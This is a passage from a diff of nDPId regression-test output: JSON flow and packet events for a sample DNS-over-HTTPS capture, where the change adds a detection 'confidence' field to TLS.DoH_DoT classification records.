hYSOHmp5J9j5vA1FjZFm5Iv6VRZaegnWKKRCmp+e5pBYWdf4T92iFA3wkmAojnbzcZPXM1FL7vahyaLx6fEfTzbYntPyfIJ2l5KJE855FQl1WRsib7X80Yvtknk5W4cHEv1yr1kjUU2CGJ8WMhJhi5rps9ncDKvd4PP0dTrH0ia8H78o1K4OYwHp0nPI0tpDBJqSO906qPhy7pON78NLR8NLi7ebyinTbjqYrIeAPW0BcPQXfo+ePTRQEGlW7G5LCAYlQCvO5j\/LMgF9c3iJwt3nUbOE+eqHvK0\/PHJmQK+ijLfXFLdBd6NBQSn3sHF\/qzgQRE5VwfSRmK55bFmg0PCiTnhGTWzfK0OvOvyyAAiwvXCaBV+gFnzKnwwQ+4ebBmLMgQpqYGGOrzwhV7P+RvbAFwMDARmYqpARsWX06T7\/aIqUa3gqpszdt6QdkNXpjrjP\/CtX9C+2AHbAmlDaq+eynMum8sDVzFoKFvQfGpt91s0+c4BcfaWSQDicP6abNOaMq+Hp75lMfIATEOyO9cUpGtsxdjbO98fR3ligfvynTicYTBBKOabjGzsvGqpIQNsc6yP7ec1DM5IvytEF3WMD\/BSWfSyCMBkPc77J1iCDteQqYtaAe0whPDVMG6GGDORujY8TM3L19IZL3YvYjw7AjSCmeKp+dThVSFL7D\/ks2Bt12v6Pc4J\/bL1kxAzO4vYx1vazs5rxcAfFBrI00UuE4UKrW1AuFrQrWAmy8gFVgJ7l+nCzCeDoyrV14OgMNuqUXIpirZiejq2fhnoXshcDAwA1MiDkD+m6EfUtBdx\/Pyl0ehgKaB76+ayZoBt6uEP7tnUDn+hUUsmcN7NZ1IZhFxhyx2uKd6w="}
-00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304846,"flow_last_seen":946739304885,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":3421,"flow_avg_l4_payload_len":1710,"midstream":1,"ts_msec":946739304885,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304846,"flow_last_seen":946739304885,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":3421,"flow_avg_l4_payload_len":1710,"midstream":1,"ts_msec":946739304885,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946739304887,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"ts_msec":946739304887,"pkt":"REREREREZmZmZmZmCABFAABoCqRAAL0GK18KAAABM56TMtqaAbsV\/Em6hf1DuFAYAfWH5wAAFAMDAAEBFwMDADVGrMk33Jx9u4V9oT8gk9T3N9siooKVMszOs96zlvjMst5cKF\/6mDE\/X3tfb1uyKq+NLUpVEQ=="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946739305016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":946739305016,"pkt":"REREREREZmZmZmZmCABFAAFIJYRAAL0Ggi8KAAABuf2aQugMAbv\/W2fgE34PaFAYAfYWNwAAFgMBARsBAAEXAwO7rF9fivBYq0PPnnVftpI5xv63Wth8iDXYIbCI66xBbCCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zZXMuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIHdlaU8VTQtoxOo631cPtMLo1fhD\/NP8\/WHh2FCfWmp6"}
-00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946739305061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"ts_msec":946739305061,"pkt":"ZmZmZmZmRERERERECABFAAuA+UlAADkGKDK5\/ZpCCgAAAQG76AwTfg9o\/1tpAFAQAIMgbwAAFgMDAHoCAAB2AwNWoPreEkJ\/UPiZCRV0IEx6jRSqugqY3M+B37V87ydZxyCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jBMBAAAuADMAJAAdACB0RVn8jGqUM9fyfUTkTuhvHxWfPva1vJ9a18\/+TyUNbgArAAIDBBQDAwABARcDAwteuwCVRbAjw9pKtY4dNJzB+NkDPzUPU\/YSrAhwNpHIEK5V+o2\/HqZHUFxtVJbEBPgURU0pRFWa9dL9lQp8LuDwWHwDq1H1B4wIu6Cjn5BK872nUeQltRw5+FbrO5MDeZZJRgg48HKHnsK1mBHQnXLVwFvBE\/e\/UwSrANn9vg+B6zkss+nwjnEuw1XfKHcjr3B+gq7Tt\/pkx\/SEVt9DDhoVQjkT+nj8Ch6uFvKMxBfoNlGXQAfQ76Cfus9zBAZT5EY1YHp8kypEbWJsqWobkhk3j7efutg\/+7i\/\/3hwY3S4DA+PZFxsrSsM6AIVwaJ95fOH1dRdOyCRxbfVQ1s5uNDJcA7OdsaNR8VQ06UA5uK3FnFY9IaeCSIuzswKtKKP\/cTlEabfxoFlZbInteiv8UhvUx14oYH8877iKbTHauga0SrPYwJ3hDQ38FuPBJ16hIcickFsAxoIxHcrJTcDxD31\/+27P70ucqJUKNnKmwnMS5iCjU275dZeWQ9Zr0T4s7GAOpJ\/qhuQ0adCzilfe+zxessB1BHzKqNpomqUeAJU6wiiIZGwIQCSR9TnB+R6Furn+4OgUG6PGNdXCZNQ9itsUGoaOah9Fd+b\/mJSMoK\/FuhgIcCIxvGAml0OlSPbxxyIuGAWgYtRBimB3o6JaqY5BlDiRDxZX24w4nNBhNEgZ23H2qCY1hFOw\/NxAIqZ6i1OczcdQK5je4mFGQnk7n2Dd0xCvT\/QbVT+DGwohNzMpmrD81sKP2YRMryNcEXaCYgEk0oi4bjQNtHjwEi3WiSTxdHtROjzPbx1MuktYL6gASggOg1Ub+v8yVRI6bLdeV5Xwvz5ZxoF9vdrBEyvVBdMauaRYoyVnXm15LfrTPUCeXkHS1kWpj909RBaupD8tKI35AMNBM63GiCNIPCKacZOle5IpXYl1uAfPyEf7I7c\/Z2VAGWif0f1eRsudqghQ1VDSbMFMSOUlZF8oqR69Dp+GUrZSkzXH\/vlToVdum7PDCHkza\/W9cBDPI5wtxaPFdq19aD9CF4UXzcnY86h4hX1BAKMl5ymvY9oQmQKwLyZZk7gJ3BG3QSRRkEJLHmElRTA\/j6+UD2DUirljLXPFbrXC2eKn2CCwq3Zuv5P5wO5+t0UU\/yghFoQluNjQ3lfw4zQuwuXqm940OzzyqoEcUuHVR8IXnZ8TZqE90q8rCtGIOP+LD4hWpqBqHuwk66vMcJQgwNCFXix5ZnSXLN0BgV30sQI8N\/4QNcrVg18QrqrwMX5353ArFRERLIaGuZFxOud2tKJXNi7\/8bnQL4pfggVMDHzys0Vv2kSkmMM9AH5fy6is33XJQsCiLeVAW2BJv0HWG\/2v54ftufeuJKqjAweFaFpf8nOnSzUujidt2Hj6vD7NzSy9u5bVuAiVU8CLsOjLUQDZZwuXq5KPOpcqPkwUfO\/JhY2IYSty68WbtoEQ\/LicI5G0k7qhGVYDDLZjTT029eOEYuXI7f+lB6Kb+6SLaMGDm8r9Mw7ebinM16XyWOwJ5JBUayf+vtez432JNrnbq1SGS5rLH5Fg5ZMgKUFbGPULmfIDV2jwsa5no0weJKoBPHSF0j2z2Ws3ZeYohMSNwPof+eIkWPeDsS0odMH3bOI8vjnmbAlt1LEuTlP9Bgfbe4EZBkTArblnr1PduSYp9HHqPcDcdegoFu3tk12XJWCeAczLwMdcKTivhfzRMPv6R\/QbwvNULNcqw3kjep\/lhPa8MK5fd2CGyIw+LCWxGXv+q\/ds\/TSYSN0doo9wcXYWwj8LntYcpK6i8bE1mnU9HhfDXOdgKZheyUxq\/2aHTotcU7hlwJGxzG1S8L2XOL+e5cK\/uWYrHMSCsilBLjzbaE58\/UhgQTo4G7REl65txB7jkxytOXC2V8igiA\/VVPL1iSyOqszjZhZj\/KQ7cRXbuiY2hUvh3d1GHeunUPxkjVr7SBFLwo5npluN5uAfc+7Lx2v8sh\/0AXjRBQzrzXUGOKzmSDk4EsluiAOjG78HzOAmharQORiNXCoRaRa+fhf0Ejafe7HoDuKqj5ukCKAbsCU6se\/uViDv0Ko0frloNjTZWVHeFLAU\/8Rxbf5R8lMV480rpPEWmLytLklZol4xviBgu3uvWIUzW30atpHjpq+x1y1B4ZeqEOMO83R7O6ddmc3f06vtoo06tW\/Agu9h766pQvpNm2vTYudTnd6DSqBlKI5KeonXz4AxZiEG5DKNiVkur+pxwlM3ugAjT44z5C6NIq2xLtYBKvjI4ZiVK+oThODcy5mgGaurXo21aX3cTizFa3bH6OPqttL9gjP05Bka27HY2jgRwKVSbziiMro9AX8Xsmg6S2yWOPjJLfqZCcbtLmpaNGvdFtOkH77j4F52qkt+me41p1UftUvN6wiwxxp99NI0\/fMosQgl7ighWoY2W\/IB0fXHatEvBsmPr1KEj7P+aJaj7oNVmyRVuFHPwaBwwi7T8Vvj9wG3gSDuuYdP5+UFDM+35GxMSRkihqY1Nf52lvDc2vDx7TdolcUJnmrezHB7iOplwsA\/pnoSxDqDzY8u2hWCRC+c4jg1z3vL2zvzGplrkFak387ZT7iXl569hRQY0g6W72J\/qU\/wWvKrh5aic7Fca9+09fN8mKvizdcBFS1tmo5ud9hSP5IApLh\/AqNGAsSvFB77AMVMPcqCZqs\/LzhQ6p8mk1Ztud+POMwqvs7eCTrsyIwvCFHr3MjxRECobkoOUnKuDn6O2Ba4MeFaOtHE1XjJdkhICNgy76FwlNk7qa2miONerIZrFWrQmU2yx1Al5ihAv+BSYo7OLYt9zXUcCSntdFwaG5iWvn2D3TqvQcyGsX7n8R8YOUmBL+xEDz8\/cHI76eHoMT9Gcmgev3Cz2de\/7ilgKsoMsC9dl+Ldtg+QDnuzeji5lROtOH+fv+MRICCWa3t+oaVa2XgjAhIywmeaAGP7+W10HhLqbtIimjrrdbxpeltnnJv0HxLov9cXj+b0Pm2tBSSGlhGmiCqLRib5vepRDq5ASTdoFYCIMH422KVZztJ1b63ltyCjG5NtOVaK\/MkO7\/KWS1XPbQXAVUScApoXkKlzQiVxTCMZQoZIoE4pH0+fjzQcElC405f+pmLRfF1iVpdbRwPdWdjvokVy8bVGY3GGXVtgS7DasELvMxZruoBcMEH12JcU31nt00epqRaM7Ty\/hGPJ9RgbFIN6nscoLHLm6YFkdOMqn+3D0CMvB4x652Bu8PF5m7DHJMIBJSoh\/WEUOZDxlHi5CT9KYRNTMZDhIkJj++9o8TtwBf\/+FOKgQZYlLc9emRrICiIhqz7dIu9M1nNq8igrwodBBqfV3IJasHHoy\/F57WNpO6ufh54oPFaVKYJn1bg656yNokeiXMSkMhJsmjb0+SAmQ0rTBRRWtbjoeZCc3gkigutNXY3WNHxKSc5xsJ9iyr3gTZdRpWgWbT+isP5Ovqam4GzSglt\/k+unyjMz4\/f8vVi\/7W288anM52u2gAT5Id3RGTrtEQDPQ8UVftSrylfoNAZTKGGhUJLAcmefkYZfUt\/EB+t1\/S5DOAvsgdK0URdbVybob0RmFJKIBsQ7DYRwD\/HgqXJ6uMDVUKO9XoO+9dwhRf11sqhooAzPCeXtVLggV615qXldaBtBjJ4Fa\/LAamnbZck+pr1D1RAPJP4HQwfBLL\/eWmzwOCA4y+tqnSn"}
-00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305016,"flow_last_seen":946739305061,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"ts_msec":946739305061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305016,"flow_last_seen":946739305061,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"ts_msec":946739305061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":946739305063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"ts_msec":946739305063,"pkt":"ZmZmZmZmRERERERECABFAAC4+UtAADkGMvi5\/ZpCCgAAAQG76AwTfhrA\/1tpAFAYAIPkeAAA4ov2OS2FYwHLyLK8HvldhjW58oZhz\/dEDG0qRvP07Xrr9KbrwFzXsPAENpwnRYTilEXtuGTXfjP8+51dqVC3h3Voz6vzPB2E1qN7598iQNHjvdaBjrZ71M3dNmhXs0fudaDBYxVH3HnrCgr\/VoLnr9AAImTV5ybiMJS9e3W0V7h9Z35p6EhyTXdDS8\/1x5Ew"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946739305650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"ts_msec":946739305650,"pkt":"REREREREZmZmZmZmCABFAAFBLvBAAL0Gw1EKAAABrGhdUJ\/qAbvjN2w6lQOuzlAYAfbLqAAAFgMBARQBAAEQAwPaSOnODEW\/53X3FLI0n+Mih\/iyk2Bze7sXLhS9N0ueoyDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALanAudGlhci5hcHAABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgYin8bJdqHx3ibHrbfDgwuFVcZV3PPNkWvp1zHo7\/2AM="}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946739305852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAXUYr5AADcGEPGsaF1QCgAAAQG7n+qVA67O4zdtU1AQABbJOgAAFgMDAHoCAAB2AwMioc+jlzNc+VBJaZcDKojs21jGEKcSNKyg9ExllQqy+iDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hhMDAAAuACsAAgMEADMAJAAdACAdEExo5yrIKmMZ4nrOia6UHa7Zh09ZMNUZYLDF+NYxaxQDAwABARcDAwAkT\/VVW9e6tSXUn2DgdOFI1vJ9CWMqaG0B1UgAogfcRWwpZ74dFwMDDDNZ3TFhx2HRd\/d\/BnLRqx3w9gJyapE59ga0mk6Gbdpy2uhfU1raH\/kLDwO0PHahqFeiov5PtmafDzH5oAzRDBThfFaKNK986AJtqna7+\/+W9HqZppsUeMeFtSdutMbm9VkvNNWFsngalQ8\/TjlWYt\/LNabidW0R+diEYRXkVHectSDnGgpIKw7AqJmgGmRJSQFZmk8mMFHUip8Ns8L0Qm+4mFM3OyM2y8uotBFp52jwBE4JcdWTlWvX638UUEwGd0+Jev1b4UZvqaI8gBJQiwDYthQvx2cilE03gvQZUs1gLv40OT\/eDg1VwASYtXu1QKuaTXj67d3FvJUxTfjdc9Un1x\/xpNxQ9IvL0JgGMqp5Nvz4C+qRYd\/CysKeUwM5LkGikxDP3qZXZjcRDF3CvWl\/0RJAgB68oCh4lzQ6BTBYQsLIO+2npSdMMO1mcmGxOeyAtRoiglI\/Mu+7bxclTAdkFUgpS6V0wzwluZmFW7Rx4iiSeZWVmQDKjFeHStRAafyFrtH26wCU1ei1O7zDiCd\/St5EWtAfoATjugif\/dASmeS6peR\/N837DyefuOM7XNJbAUXXdVYFQbj88dVPYC1ZWfSpl1wPAKf87TREgv6h4ZkxzRnB6COvKSvUqklCC1SSMJfennS1L0Etglf8wZsulJYWIe6+sEiyvEkrN24bb021w2X\/KuVEn+j5dyEDiGG5loD+4VYwc9G5Wa+jxRUO0+A62CO2opPif7xWIxQXRSJ441bKp\/i7j7P+cl88sdZsTxv2ygPWKGEBO4XHbg95EUra3m5LdhfhQUM\/e\/n+Ak+LAL3mStir5xjEDf9+haA4s5VbKmTRNrJtFiUwt198TeBjvlKCejLbJO6d8gE6SQECz4iM7IcNa\/bXR7adNUuu8qhullq5WfyiHcztVpItdHmrHXbaCsGaPgIKVpIJp30oUBjXbdyBrklTyARetsx+L4hfDlDZiZOEujpickcQVHRV+Rq6dF5UrRJYU3XU\/ZcqBeRvNXpu9d46M\/bhnVClgq2Bd+aOiR2kaho07AGNJ9Fr4k5Jos+2Q6DGpQasXC6x+iPauGKBp59nwGXbOOKtd8ArTxOlVzQmOZH6I0tx+iKMplPSCHR8FFec2EwXBLm\/1vyI9Pwo+zYiVdHp09rRHeJXaKGgiynxtv128gHPWfts6k\/bUS8N1Dw2y1OWa2cDxVOv79IA65ALHyABrPQbEH+byQd5tzeWrWUmzmNi3p4jdd62IgsA8HkYmsZmy5jIyKyWEYlUo1SPeqjIhX9VriaKoSoSKPFRDULdhc+03ZBXd6SKMHCSS7x6DpL0ufFkfc0ZfcGyz8s\/jngcscp5gmPQrY+VfOmrZe4EnOIAqkwdbS5Vejc5Yga2D4LRGGWgMYBm5SScqu5500ZCpE0WmkryZPm\/4OMJ47iDZWRTkVie5Ea9ONRDlM9tVglWZF\/oUiAJVVWh4mt0z6nVYUgTMbtTn0pDKN\/0TJikQ5gt3TXgtioj57ko+eiK8raQcuhqyXG3KA52lsLM2MmWuS6VxCjD2hxANDc3R7BZOaM4bmyza4JUsEms3Y5aNGYiFwaMTvyvPSX55q5QHTJ\/Mi827fNg4TtCrFRxN6XxJuU0RfIATOX3faQkD1YP1V51gStaTXEj1EBrNyqEnKqYk6Yxs2aBmn4CqaTQ7ru+2yyoapdX3D0JCzKb"}
-00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305650,"flow_last_seen":946739305852,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1733,"flow_avg_l4_payload_len":866,"midstream":1,"ts_msec":946739305852,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305650,"flow_last_seen":946739305852,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1733,"flow_avg_l4_payload_len":866,"midstream":1,"ts_msec":946739305852,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
